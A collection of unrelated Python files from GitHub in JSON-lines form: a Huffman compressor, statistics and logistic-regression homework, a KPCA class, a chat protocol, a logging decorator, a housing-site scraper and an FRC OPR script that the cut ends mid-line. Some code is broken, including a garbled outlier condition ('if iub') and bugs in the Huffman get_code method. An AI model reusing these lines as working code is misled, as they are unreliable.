哈夫曼算法\n\n'''\n霍夫曼编码是一种使用变长编码表编码源符号的无损压缩算法。它的核心思想是计算各个符号的权重,出现次数较多的符号拥有较大的权重,出现次数较少的符号拥有较小的权重。然后对符号进行前缀编码,用较短的编码表示拥有较长权重的符号,用较长的编码表示拥有较短权重的符号。这样,总体来说,对于符号出现次数不均衡的序列,霍夫曼编码就能够拥有较好的表现。\n\n压缩过程\n霍夫曼编码的压缩阶段主要有以下几个步骤:\n\n读入符号,计算各��符号的权重。\n根据符号的权重建立霍夫曼树。\n依据霍夫曼树建立编码表。\n压缩\n计算权重\n计算权重很容易理解。遍历符号,计算各个符号出现的次数。把出现的次数当作权重即可。实际实现中,如果以字节为单位压缩,考虑到一个字节有8位,最大能表示255。为了操作方便,可以将出现的次数除以最大的出现次数,再乘以256当作权重。这样,所有权重就刚分布在一个字节的表示范围以内。\n\n同时,考虑到一个字节的编码刚好是0~255,可以建立一个数组,这个数组的下标表示对应的符号,这个数组的值表示符号的权重。\n\n\n计算了各个符号的权重之后,就可以根据这些权重建立霍夫曼树。从霍夫曼树中,我们可以得到符号的前缀码表。\n\n建立霍夫曼树\n霍夫曼树是一颗二叉树,其每个节点至少有四个值——符号,权重,左树指针,右树指针。建立霍夫曼树主要有两种方式。第一种是使用一个优先队列(堆)。首先,为所有的符号创造一个节点,储存进这个符号本身和它的权重。然后将所有的节点压入优先队列,拥有最低权重的节点拥有最高的优先级(即,低权重的节点会先被弹出。)然后执行以下步骤:\n\n如果优先队列中的元素大于一,弹出两个节点。以这两个节点为左右指针创建一颗新的霍夫曼树,其权重为作为节点之和。将这个新树压入优先队列。重复本步骤。\n否则,弹出剩下的元素作为最终的霍夫曼树。\n除了优先队列外,还可以使用两个队列来建立霍夫曼树。首先,像前面那样创建节点,按照权重排序所有节点。然后创建两个队列,将节点按照权重从低到高的顺序依次入其中一个队列1。然后执行以下步骤:\n\n如果一个队列为空,从另一个队列中弹出两个元素;否则,比较两个队列首元素的权重,弹出权重最小的两个元素。用这两个元素作为子树建立一个新的霍夫曼树,其权重为两元素权重之和。将这颗新树压入队列2。重复本步骤,直到队列只剩下一个元素。\n弹出这个元素作为最终的霍夫曼树。\n\n建立编码表\n根据得到的霍夫曼树,我们可以为符号建立一组前缀码。\n\n如果一组编码,其中任意一个编码都不为另一个编码的前缀,那么我们就称这组编码为一组前缀码。将符号使用前缀码编码是极有意义的。这意味着,对于一组编码,我们可以不借助任何分割符解码其中的每一个符号。即,此时,这组编码是唯一可解的。\n\n前面说过,霍夫曼树是一颗二叉树。因此,这颗二叉树的所有叶子节点的路径组成的编码即为一组前缀码。把左子树编码为0,将右子树编码为1。\n\n\n压缩\n把符号按照编码表替换为相应为即可。\n\n如果用C语言实现,可以方便地直接对内存进行位操作。而Python的位操作比较麻烦。因此,可以先将所有二进制编码先视为字符串,然后每8位字符串转换为一个16进制数,转换为python中的bytes类型,直接写入文件即可。\n\n将符号频率同编码一同写入文件,就可以在之后通过读取频率来解压。\n\n\n解压过程\n解压过程较简单,是前面压缩过程的逆操作。\n\n首先读取符号频率,根据符号频率建立霍夫曼树,然后再根据霍夫曼树解压编码即可。\n\n'''\n\nimport heapq\n\n\nclass HuffmanNode:\n def __init__(self, symbol=None, freq=None):\n self.symbol = symbol\n self.freq = freq\n self.parent = None\n self.left = None\n self.right = None\n\n def __lt__(self, other):\n return self.freq < other.freq\n\n def is_leaf(self):\n return not self.left and not self.right\n\n def get_code(self):\n # 调试用\n if not self.is_laef():\n raise ValueError(\"Not a leaf node.\")\n\n code = ''\n node = self\n while node.parent:\n if node.parent.left == node:\n code = '0' + code\n else:\n code = '1' + code\n code = code.parent\n\n return code\n\n\nclass Huffman:\n BYTE_MAX_NUM = 255\n\n def __init__(self):\n self.origin = None\n self.compressed = None\n self.huffman_tree = None\n self.freqs = [0 for _ in range(self.BYTE_MAX_NUM + 1)]\n self.coding_table = [0 for _ in range(self.BYTE_MAX_NUM + 1)]\n self.reverse_table = {}\n self.coding_str = ''\n\n def _minimize_frequencies(self):\n # 缩小字频使其在一个字节范围以内\n max_freq = max(self.freqs)\n\n for symbol, freq in enumerate(self.freqs):\n scale_freq = int(self.BYTE_MAX_NUM * (freq / max_freq))\n scale_freq = 1 if not scale_freq and freq else scale_freq\n\n self.freqs[symbol] = scale_freq\n\n def _get_symbol_frequencies(self):\n for symbol in self.origin:\n self.freqs[symbol] += 1\n\n self._minimize_frequencies()\n\n def _initial_node_heap(self):\n self._heap = []\n for symbol, freq in enumerate(self.freqs):\n node = HuffmanNode(symbol, freq)\n heapq.heappush(self._heap, node)\n\n def _build_huffman_tree(self):\n self._initial_node_heap()\n\n while len(self._heap) > 1:\n node1 = heapq.heappop(self._heap)\n node2 = heapq.heappop(self._heap)\n\n new_node = HuffmanNode(symbol=None, freq=node1.freq + node2.freq)\n new_node.left, new_node.right = node1, node2\n node1.parent, node2.parent = new_node, new_node\n heapq.heappush(self._heap, new_node)\n\n self.huffman_tree = heapq.heappop(self._heap)\n del self._heap\n return self.huffman_tree\n\n def _build_coding_table(self, node, code_str=''):\n if node is None:\n return\n\n if node.symbol is not None:\n self.coding_table[node.symbol] = code_str\n self.reverse_table[code_str] = node.symbol\n\n self._build_coding_table(node.left, code_str + '0')\n self._build_coding_table(node.right, code_str + '1')\n\n def _pading_coding_str(self):\n pading_count = 8 - len(self.coding_str) % 8\n self.coding_str += '0' * pading_count\n state_str = '{:08b}'.format(pading_count)\n self.coding_str = state_str + self.coding_str\n\n def _prefix_coding_freqs(self):\n coding_freqs = []\n for freq in self.freqs:\n coding_freqs.append('{:08b}'.format(freq))\n coding_freqs = ''.join(coding_freqs)\n self.coding_str = coding_freqs + self.coding_str\n\n def _build_codeing_str(self):\n temp = []\n for symbol in self.origin:\n temp.append(self.coding_table[symbol])\n self.coding_str = ''.join(temp)\n\n self._pading_coding_str()\n self._prefix_coding_freqs()\n\n return self.coding_str\n\n def _get_compressed(self):\n assert (len(self.coding_str) % 8 == 0)\n\n b = bytearray()\n for index in range(0, len(self.coding_str), 8):\n code_num = int(self.coding_str[index:index + 8], 2)\n b.append(code_num)\n\n self.compressed = bytes(b)\n return self.compressed\n\n def _read_frequencies_from_compressed(self):\n coding_freqs = self.compressed[:self.BYTE_MAX_NUM + 1]\n for index, freq in enumerate(coding_freqs):\n self.freqs[index] = freq\n\n def _get_real_coding_from_compressed(self):\n pading_count = self.compressed[self.BYTE_MAX_NUM + 1]\n byte_coding_str = self.compressed[self.BYTE_MAX_NUM + 2:]\n coding_str = []\n for num in byte_coding_str:\n temp = bin(num)[2:]\n # 补足省略掉的前导零\n temp = '0' * (8 - len(temp)) + temp\n assert (len(temp) == 8)\n coding_str.append(temp)\n coding_str = ''.join(coding_str)\n assert (len(coding_str) % 8 == 0)\n real_coding_str = coding_str[:-pading_count]\n return real_coding_str\n\n def _decode_compressed(self):\n real_coding_str = self._get_real_coding_from_compressed()\n decode_content = []\n\n node = self.huffman_tree\n for state in real_coding_str:\n if state == '0':\n node = node.left\n elif state == '1':\n node = node.right\n\n if node.symbol is not None:\n assert (0 <= node.symbol <= self.BYTE_MAX_NUM)\n hex_str = hex(node.symbol)[2:]\n # fromhex方法将两个字符识别为一个16进制数\n # 所以单个数需要补零\n hex_str = '0' + hex_str if len(hex_str) == 1 else hex_str\n decode_content.append(hex_str)\n node = self.huffman_tree\n\n decode_content = ''.join(decode_content)\n return bytes.fromhex(decode_content)\n\n def clear(self):\n self.__init__()\n\n def encode(self, origin):\n self.clear()\n self.origin = origin\n self._get_symbol_frequencies()\n self._build_huffman_tree()\n self._build_coding_table(self.huffman_tree)\n self._build_codeing_str()\n\n return self._get_compressed()\n\n def compresse(self, filename, output_filename=None):\n with open(filename, 'rb') as file:\n origin = file.read()\n\n compressed_content = self.encode(origin)\n if output_filename is None:\n output_filename = filename + '.hfm'\n with open(output_filename, 'wb') as file:\n file.write(compressed_content)\n\n return True\n\n def decode(self, compressed):\n self.clear()\n self.compressed = compressed\n self._read_frequencies_from_compressed()\n self._build_huffman_tree()\n return self._decode_compressed()\n\n def uncompresse(self, filename, output_filename=None):\n with open(filename, 'rb') as file:\n compressed = file.read()\n\n decode_content = self.decode(compressed)\n if output_filename is None:\n if filename.endswith('.hfm'):\n output_filename = filename[:-4]\n else:\n output_filename = filename + '.dhfm'\n\n with open(output_filename, 'wb') as file:\n file.write(decode_content)\n\n return True\n","repo_name":"runningabcd/Spider-Life","sub_path":"Algorithm/huffmanTree.py","file_name":"huffmanTree.py","file_ext":"py","file_size_in_byte":11052,"program_lang":"python","lang":"zh","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"26376973358","text":"import numpy as np\r\nimport matplotlib.pyplot as la\r\nfrom scipy import stats\r\n\r\n# function to calculate mode\r\ndef get_mode(list) :\r\n\tcount = 0\r\n\tnum = list[0]\r\n\tfor i in list :\r\n\t\tfreq = list.count(i)\r\n\t\tif freq>count :\r\n\t\t\tcount = freq\r\n\t\t\tnum = i\r\n\treturn num,count\r\n\r\n# array definition and its boxplot\r\nset = np.random.randint(0,101,1000)\r\n# set = np.append(set,[156,-65])\r\nfig = la.figure()\r\nla.boxplot(set)\r\nfig.savefig(\"box.png\")\r\n\r\n# sorting array\r\nsorted_data = np.sort(set).tolist()\r\n\r\n# stats using predefined functions\r\nmean_set = np.mean(set)\r\nmedian_set = np.median(set)\r\nmode_set = stats.mode(set)\r\nquantile1_set = np.percentile(set,25)\r\nquantile2_set = np.percentile(set,50)\r\nquantile3_set = np.percentile(set,75)\r\niqr_set = stats.iqr(set)\r\n\r\n\r\n# printing data of predefined functions\r\nprint(\"Predefined function\\n--------------------\\nMean: \",mean_set,\" ; Median: \",median_set,\" ; Mode: \",mode_set,\" ; 1st Quartile: \",quantile1_set,\" ; 2nd Quartile: \",quantile2_set,\" ; 3rd Quartile: \",quantile3_set,\" ; InterQuartileRange: \",iqr_set,'\\n')\r\n\r\n# calculating mean\r\nlent = len(set)\r\nsum = np.sum(set)\r\nmean = sum/lent\r\n\r\n# calculating mediant\r\nmedian = 0\r\nif (lent%2 == 0) :\r\n\tmedian = (sorted_data[(lent//2)-1] + sorted_data[lent//2])/2\r\nelse :\r\n\tmedian = sorted_data[(lent-1)//2]*1.0\r\n\r\n# calculating quartiles\r\nquantile1 = 0\r\nif (lent+1)%4 == 0 :\r\n\tquantile1 = sorted_data[((lent+1)//4)-1]*1.0\r\nelse :\r\n\tquantile1 = (sorted_data[((lent+1)//4)-1] + sorted_data[(lent+1)//4])/2\r\n\r\nquantile2 = median\r\n\r\nquantile3 = 0\r\nif (3*(lent+1))%4 == 0 :\r\n\tquantile3 = sorted_data[((3*(lent+1))//4)-1]*1.0\r\nelse :\r\n\tquantile3 = (sorted_data[((3*(lent+1))//4)-1] + sorted_data[(3*(lent+1))//4])/2\r\n\t\r\n\r\n# outliers\r\niqr = quantile3 - quantile1\r\nub = quantile3 + 1.5*iqr\r\nlb = quantile1 - 1.5*iqr\r\noutliers = []\r\n\r\nfor i in sorted_data :\r\n\tif iub :\r\n\t\toutliers.append(i)\r\n\telse :\r\n\t\tcontinue\r\n\r\n# calculating mode\r\nmode,count = get_mode(sorted_data)\r\n\r\n# printing calculated data\r\nprint(\"Calculated\\n--------------------\\nMean: \",mean,\" ; Median: \",median,\" ; Mode: \",mode,\",count: \",count,\" ; 1st Quartile: \",quantile1,\" ; 2nd Quartile: \",quantile2,\" ; 3rd Quartile: \",quantile3,\" ; InterQuartileRange: \",iqr)\r\n\r\nprint(\"Outliers: \",outliers)","repo_name":"abhiisshheekk/data_analysis","sub_path":"Box.py","file_name":"Box.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73951027627","text":"import torch\nfrom torch import Tensor as T\n\nfrom .level import Level\nfrom ._kpca import _KPCA\nfrom kerch import utils\n\n\nclass KPCA(_KPCA, Level):\n r\"\"\"\n Kernel Principal Component Analysis.\n \"\"\"\n\n @utils.extend_docstring(_KPCA)\n @utils.extend_docstring(Level)\n @utils.kwargs_decorator({})\n def __init__(self, *args, **kwargs):\n super(KPCA, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return \"KPCA with \" + Level.__str__(self)\n\n def reconstruct(self, x=None, representation=None):\n representation = utils.check_representation(representation, self._representation, self)\n if representation == 'primal':\n phi = self.phi(x)\n U = self.weight\n R = U @ U.T\n return phi @ R\n else:\n K = self.k(x)\n H = self.hidden\n R = H @ H.T\n return K @ R\n\n def _update_hidden_from_weight(self):\n self.hidden = self(representation='primal') @ torch.diag(1 / self.vals)\n","repo_name":"hdeplaen/kerch","sub_path":"kerch/rkm/kpca.py","file_name":"kpca.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"29823552002","text":"import json\nimport time\n\n\ndef pack(raw_message, send_from, chat_with, message_type):\n \"\"\"\n 打包消息,用于发送\n :param raw_message: 正文消息\n :param send_from: 发送者\n :param chat_with: 聊天对象\n :param message_type: 消息类型\n :param file_name: 文件名,如果不是���件类型,则为None\n \"\"\"\n message = {\n 'by': send_from,\n 'to': chat_with,\n 'type': message_type,\n 'time': time.time(),\n 'message': raw_message,\n } # 先把收集到的信息存储到字典里\n return (json.dumps(message) + '\\0').encode('utf-8') # 再用json打包\n\n\ndef unpack(json_message: bytes):\n \"\"\"\n 解包消息,用于接收JSON格式的消息\n 看不懂message字典对应的东西吗?message_types里面有。\n\n :param json_message: JSON消息\n :return: 返回的东西有很多,也有可能是报错\n ==================================================\n return返回值大全:\n JSON_MESSAGE_NOT_EOF: 消息不完整\n NOT_JSON_MESSAGE: 不是JSON格式的消息\n MANIFEST_NOT_JSON: 用户名单不是JSON格式\n UNKNOWN_MESSAGE_TYPE: 未知消息类型\n --------------------------------------------------\n FILE_SAVED: 文件保存成功\n <一个列表>: 这是用户名单,有用的\n \"\"\"\n try:\n message = json.loads(json_message)\n if isinstance(message, list):\n message = message[0]\n message = json.loads(message)\n except json.decoder.JSONDecodeError:\n return 'DO_NOT_PROCESS',\n except UnicodeDecodeError:\n return 'DO_NOT_PROCESS',\n\n if 'to' not in message or 'by' not in message or 'message' not in message:\n return None,\n if message['type'] == 'TEXT_MESSAGE' or \\\n message['type'] == 'COLOR_MESSAGE': # 如果是纯文本消息\n return message['type'], message['to'], message['by'], message['time'], message['message']\n elif message['type'] == 'USER_NAME' or \\\n message['type'] == 'REGISTER': # 如果是用户名称\n try:\n username = message['message']\n return message['type'], username\n except json.decoder.JSONDecodeError:\n return 'MANIFEST_NOT_JSON',\n elif message['type'] == 'COMMAND':\n return message['type'], message['by'], message['message']\n else:\n return 'UNKNOWN_MESSAGE_TYPE',\n","repo_name":"ThirdBlood/Lhat-Server","sub_path":"server_operations.py","file_name":"server_operations.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34513505195","text":"import Functions\r\n\r\nclass tests:\r\n def __init__(self):\r\n self.__coord_x=0\r\n self.__coord_y=0\r\n self.__color=''\r\n \r\n def set_point1(self):\r\n points=[]\r\n point1=Functions.MyPoint(1,2,'red')\r\n point2=Functions.MyPoint(2,3,'blue')\r\n point3=Functions.MyPoint(1,2,'green')\r\n points.append(point1)\r\n points.append(point2)\r\n points.append(point3)\r\n return points\r\n\r\n def set_point2(self):\r\n points=[]\r\n point1=Functions.MyPoint(1,2,'red')\r\n point2=Functions.MyPoint(9,9,'red')\r\n point3=Functions.MyPoint(1,2,'green')\r\n points.append(point1)\r\n points.append(point2)\r\n points.append(point3)\r\n return points\r\n\r\n def set_point3(self):\r\n points=[]\r\n point1=Functions.MyPoint(1,2,'yellow')\r\n point2=Functions.MyPoint(2,3,'blue')\r\n point3=Functions.MyPoint(1,2,'magenta')\r\n points.append(point1)\r\n points.append(point2)\r\n points.append(point3)\r\n return points\r\n\r\n def get_all_points_test(self):\r\n self=tests.set_point1(self)\r\n assert Functions.PointRepository.get_all_points(self)==\"Point(1,2) of color red\\nPoint(2,3) of color blue\\nPoint(1,2) of color green\"\r\n \r\n def run_tests():\r\n self=[]\r\n tests.get_all_points_test(self)","repo_name":"IgnatiucMircea/Points","sub_path":"Tests.py","file_name":"Tests.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20301611050","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport sys\n\n# In[2]:\n\n\ndef sigmoid(z):\n return 1.0 / (1.0+np.exp(-1.0*z))\n\ndef gradient(x_data, y_data, w, lam):\n g = np.zeros(len(w))\n for i in range(len(x_data)):\n x = np.array(x_data[i],dtype=float)\n f = sigmoid(np.dot(w.T,x))\n g += (f - float(y_data[i]))*x\n g = g + 2*lam*w\n return g/len(x_data)\n\ndef Accuracy(x_data,y_data,w):\n count = 0\n for i in range(len(x_data)):\n f = sigmoid(np.dot(w.T,x_data[i]))\n if f > 0.5:\n if float(y_data[i])==1:\n count+=1\n else:\n if float(y_data[i])==0:\n count+=1\n return (1.0*count/len(y_data))\n\ndef logistic(x_data, y_data, eta, batch_size, epoch, lam):\n w = np.zeros(len(x_data[0]))\n train_size = len(x_data)\n iteration = int(train_size/batch_size)+1\n s_grad = np.ones(len(x_data[0]))/1000000000000000\n for time in range(epoch):\n for i in range(iteration):\n batch_sample_x = x_data[i*batch_size:min((i+1)*batch_size,train_size)]\n batch_sample_y = y_data[i*batch_size:min((i+1)*batch_size,train_size)]\n g = gradient(batch_sample_x,batch_sample_y,w, lam)\n s_grad += g**2\n ada = np.sqrt(s_grad)\n #ada = [1 if ele ==0 else ele for ele in ada]\n w = w - eta*g/ada\n #eta*=0.97\n if (time+1)%int(epoch/10) == 0:\n cost = np.sum([abs(sigmoid(np.dot(w.T,x_data[j]))-y_data[j]) for j in range(len(x_data))])\n print(\"Epoch %d/%d | Cost: %.2f | Accuracy: %.4f\" %(time+1,epoch,cost,Accuracy(x_data,y_data,w)))\n \n return w\n\ndef test_output(x_data,w):\n result = []\n for i in range(len(x_data)):\n id = str(i+1)\n err = sigmoid(np.dot(w.T,x_data[i]))\n if err > 0.5:\n result.append([id, 1])\n else:\n result.append([id, 0])\n return result\n\n\n# In[3]:\n\n\ntrain_data = pd.read_csv(sys.argv[1])\n\n\n# In[4]:\n\n\nY = train_data['income'].map({\" <=50K\":0,\" >50K\":1}).values\ntrain_data.drop('income',axis=1,inplace=True)\n\ntrain_data.age = train_data.age.astype(float)\ntrain_data.fnlwgt = train_data.fnlwgt.astype(float)\ntrain_data.education_num = train_data.education_num.astype(float)\ntrain_data.hours_per_week = train_data.hours_per_week.astype(float)\n\ntrain_data = pd.get_dummies(train_data, columns=[\n \"workclass\", \"education\", \"marital_status\", \"occupation\", \"relationship\",\n \"race\", \"sex\", \"native_country\",\n])\n\n\n# In[5]:\n\n\ndrop_out_list = [\"occupation_ ?\", \"workclass_ ?\",\n \n \"native_country_ ?\", \"native_country_ Cambodia\", \"native_country_ Canada\",\n \"native_country_ China\", \"native_country_ Columbia\", \"native_country_ Cuba\", \"native_country_ Dominican-Republic\",\n \"native_country_ Ecuador\", \"native_country_ El-Salvador\", \"native_country_ England\", \"native_country_ France\",\n \"native_country_ Germany\", \"native_country_ Greece\", \"native_country_ Guatemala\", \"native_country_ Haiti\",\n \"native_country_ Holand-Netherlands\",\"native_country_ Honduras\",\"native_country_ Hong\",\"native_country_ Hungary\",\n \"native_country_ India\",\"native_country_ Iran\",\"native_country_ Ireland\",\"native_country_ Italy\",\"native_country_ Jamaica\",\n \"native_country_ Japan\",\"native_country_ Laos\",\"native_country_ Mexico\",\"native_country_ Nicaragua\",\n \"native_country_ Outlying-US(Guam-USVI-etc)\",\"native_country_ Peru\",\"native_country_ Philippines\",\"native_country_ Poland\",\n \"native_country_ Portugal\",\"native_country_ Puerto-Rico\",\"native_country_ Scotland\",\"native_country_ South\",\n \"native_country_ Taiwan\",\"native_country_ Thailand\",\"native_country_ Trinadad&Tobago\",\"native_country_ United-States\",\n \"native_country_ Vietnam\",\"native_country_ Yugoslavia\",\n \n \"relationship_ Husband\",\"relationship_ Not-in-family\",\"relationship_ Other-relative\",\n \"relationship_ Own-child\",\"relationship_ Unmarried\", \"relationship_ Wife\",\n \n \"education_ 10th\",\"education_ 11th\", \"education_ 12th\", \"education_ 1st-4th\", \"education_ 5th-6th\", \n \"education_ 7th-8th\", \"education_ 9th\", \"education_ Assoc-acdm\", \"education_ Assoc-voc\", \n \"education_ Bachelors\", \"education_ Doctorate\", \"education_ HS-grad\", \"education_ Masters\", \n \"education_ Preschool\", \"education_ Prof-school\", \"education_ Some-college\",\n \n \"race_ Amer-Indian-Eskimo\", \"race_ Asian-Pac-Islander\", \"race_ Black\", \"race_ Other\", \"race_ White\"\n ]\ndf = pd.DataFrame(train_data)\ndf.drop(drop_out_list, axis=1, inplace=True,)\n\n\n# In[6]:\n\n\nscale = []\nfor col in df.columns:\n s = [col]\n maximun = max(df[col])\n minimum = min(df[col])\n if maximun != 1:\n m = df[col].mean()\n v = df[col].std()\n s.append(m)\n s.append(v)\n df[col] = (df[col]-m)/v\n #df[col] = (df[col]-minimum)/maximun-minimum\n #s.append(maximun)\n #s.append(minimum)\n scale.append(s)\n\nDataSet_X = df.values\nDataSet_Y = Y\n\n\n# In[7]:\n\n\nw = logistic(DataSet_X,DataSet_Y,0.01,512,200,0.00001)\n\n\n# In[8]:\n\n\n#input data\ntest_data = pd.read_csv(sys.argv[2])\ntest_data.age = test_data.age.astype(float)\ntest_data.fnlwgt = test_data.fnlwgt.astype(float)\ntest_data.education_num = test_data.education_num.astype(float)\ntest_data.hours_per_week = test_data.hours_per_week.astype(float)\ntest_data = pd.get_dummies(test_data, columns=[\n \"workclass\", \"marital_status\", \"occupation\", \"sex\"\n])\n\n# Get missing columns in the training test\nmissing_cols = set( train_data.columns ) - set( test_data.columns )\n# Add a missing column in test set with default value equal to 0\nfor c in missing_cols:\n test_data[c] = 0\n\ntest_df = pd.DataFrame(test_data)\ntest_df.drop(drop_out_list, axis=1, inplace=True,)\n# Ensure the order of column in the test set is in the same order than in train set\ntest_df = test_df[df.columns]\n\n\n# In[9]:\n\n\nfor s in scale:\n col = s[0]\n test_df[col] = (test_df[col]-s[1])/s[2]\ninput_x = []\nfor i in range(test_df.shape[0]):\n input_x.append(list(test_df.iloc[i,:]))\nr = test_output(input_x,w)\n\nexport_df = pd.DataFrame(r,columns=['id','label'])\nexport_df.to_csv(sys.argv[6],sep=',',encoding='utf-8',index=False)\n\n","repo_name":"huhuman/ML2018SPRING","sub_path":"hw2/hw2_logistic.py","file_name":"hw2_logistic.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22707130169","text":"# coding:utf8\nimport logging\nfrom functools import wraps\nfrom time import localtime, time, strftime, sleep\nfrom random import choice\n\n# 如何在类中定义装饰器\n\n''''''\n\n'''\n实例:\n实现一个能将函数调用信息记录到日志的装饰器:\n1.把每次函数的调用时间,执行时间,调用次数写入日志\n2.可以对被装饰函数分组,调用信息记录到不同日志\n3.动态修改参数,比如日志格式\n4.动态打开关闭日志输出功能\n'''\n'''\n为了让装饰器在使用上更加灵活,可以把类的实例方法作为装饰器,\n此时在包裹函数中就可以持有实例对象,便与修改属性和拓展功能\n'''\n\n\nclass CallingInfo(object):\n def __init__(self, name):\n log = logging.getLogger(name)\n log.setLevel(logging.INFO)\n fh = logging.FileHandler(name + '.log')\n log.addHandler(fh)\n log.info('start'.center(50, '.'))\n self.log = log\n self.formatter = '%(func)s -> [%(time)s - %(used)s - %(ncalls)s]'\n\n def info(self, func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n lt = localtime() # 表示函数的调用时间点\n t2 = time()\n res = func(*args, **kwargs)\n wrapper.ncalls += 1 # 表示函数调用次数\n used = time() - t2 # t3-t2 used时间\n info = {}\n info['func'] = func.__name__\n info['time'] = strftime('%x %X', lt)\n info['used'] = used\n info['ncalls'] = wrapper.ncalls\n msg = self.formatter % info\n self.log.info(msg)\n return res\n\n wrapper.ncalls = 0\n\n return wrapper\n\n def setFormatter(self, formatter):\n self.formatter = formatter\n\n def turnOn(self):\n self.log.setLevel(logging.INFO)\n\n def turnOff(self):\n self.log.setLevel(logging.WARN)\n\n\nif __name__ == '__main__':\n cinfo1 = CallingInfo('mylog1')\n cinfo2 = CallingInfo('mylog2')\n\n formatter = '%(func)s -> [%(time)s - %(ncalls)s]'\n cinfo1.setFormatter(formatter)\n cinfo2.turnOff()\n @cinfo1.info\n def f():\n print('in f')\n\n\n @cinfo1.info\n def g():\n print('in g')\n\n\n @cinfo2.info\n def h():\n print('in h')\n\n\n for _ in range(50):\n choice([f, g, h])()\n sleep(choice([0.5, 1, 1.5]))\n","repo_name":"zhwl934008411/Python-Advanced-Programing","sub_path":"index9/index9-5.py","file_name":"index9-5.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72429354986","text":"import requests, pprint, pandas\nfrom bs4 import BeautifulSoup\n\nss = requests.session()\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/80.0.3987.132 Safari/537.36'}\npages = 10 # 總頁數\ncurrent_page = 1\nfor m in range(pages):\n url = f'https://newhouse.591.com.tw/home/housing/search?rid=1&page={current_page + m}&sid='\n res = ss.get(url, headers=headers).json()\n\n for anyy in res['data']['items']:\n # pprint.pprint(anyy)\n # print(len(res['data']['items'])) #20筆\n\n # 把每筆物件的標籤整合為一個字串 不然印成csv會變多列\n tag_str=''\n for anyyy in anyy['tag']:\n tag_str += anyyy + ' '\n anyy['tag'] = tag_str\n\n # bid = 細項網址\n anyy['bid'] = 'https://newhouse.591.com.tw/home/housing/detail?hid=' + str(anyy['hid'])\n\n # 去除不重要的欄位\n if 'video_pic' in anyy:\n del anyy['video_pic']\n if 'event_show_url' in anyy:\n del anyy['event_show_url']\n if 'event_click_url' in anyy:\n del anyy['event_click_url']\n if 'event_show' in anyy:\n del anyy['event_show']\n if 'event_click' in anyy:\n del anyy['event_click']\n if 'cover' in anyy:\n del anyy['cover']\n if 'native_orderno' in anyy:\n del anyy['native_orderno']\n if 'is_video' in anyy:\n del anyy['is_video']\n if 'isvip' in anyy:\n del anyy['isvip']\n\n pprint.pprint(anyy)\n\n # 建立 dataframe\n tt = pandas.DataFrame.from_dict(anyy,orient='index').T\n\n # 第一頁第一筆時重開檔案,其它時候 append 上去\n if anyy == res['data']['items'][0] and m == 0:\n tt.to_csv('591.csv', mode='w', encoding='utf-8-sig', index=False)\n else:\n tt.to_csv('591.csv', mode='a', encoding='utf-8-sig', header=False, index=False)\n","repo_name":"balao1312/MyWork","sub_path":"littlework/591_scraing.py","file_name":"591_scraing.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4904879572","text":"import re\nfrom commonUtils import getSentimentDictionary,getStopWordList,processTweet,replaceTwoOrMore\n\n#start getfeatureVector\ndef getFeatureVector(tweet):\n featureVector = []\n processed_tweet = processTweet(tweet);\n #split tweet into words\n words = processed_tweet.split()\n for w in words:\n #replace two or more with two occurrences\n w = replaceTwoOrMore(w)\n #strip punctuation\n w = w.strip('\\'\"?,.')\n #check if the word stats with an alphabet\n val = re.search(r\"^[a-zA-Z][a-zA-Z0-9]*$\", w)\n #ignore if it is a stop word\n stopWordsList = set(getStopWordList())\n if(w in stopWordsList or val is None):\n continue\n else:\n featureVector.append(w)\n return featureVector\n#end\n\n\n\ndef getSentiment(feature_vector):\n pos_neg_count = 0;\n sentiment_dictionary = getSentimentDictionary()\n for word in feature_vector:\n pos_neg_count += sentiment_dictionary.get(word,0); \n sentiment = 'neutral'; \n if(pos_neg_count > 0):\n sentiment = 'positive'\n elif(pos_neg_count < 0):\n sentiment = 'negative'\n return sentiment \n\n#start extract_features\ndef extract_word_features(tweet):\n return dict([(word, True) for word in tweet])\n#end\n\n","repo_name":"MukulLatiyan/sentiment-analysis-data","sub_path":"sentimentUtils.py","file_name":"sentimentUtils.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40735539845","text":"import statistics as stat\r\nimport gen\r\ntba = gen.setup()\r\n\r\n#These control which year and district data is pulled for\r\nYEAR = 2018\r\nDISTRICT = 'chs'\r\n\r\n#Structures to hold commonly used data\r\neventData = {}\r\nteamsList = []\r\n\r\n#Fetch district teams and events\r\ndistTeams = tba.district_teams(str(YEAR) + DISTRICT, False)\r\ndistEvents = tba.district_events(str(YEAR) + DISTRICT)\r\n\r\n#Store data on common district events first\r\nfor event in distEvents:\r\n eventData[event['key']] = tba.event_oprs(event['key'])\r\n\r\nteamCount = 0\r\nfor team in distTeams:\r\n teamCount += 1\r\n gen.progressBar(teamCount, len(distTeams))\r\n oprs = []\r\n\r\n events = tba.team_events(team['key'], YEAR)\r\n \r\n for event in events:\r\n \r\n #Only run on official events, ignores preseason, offseason, and unlabled\r\n #Try / Except to handle borked events\r\n #Tries to load data from eventData first, only hits TBA if needed\r\n #Stores team OPR data for later use.\r\n if event['event_type'] in range(0,10):\r\n try:\r\n if event['key'] in eventData.keys():\r\n 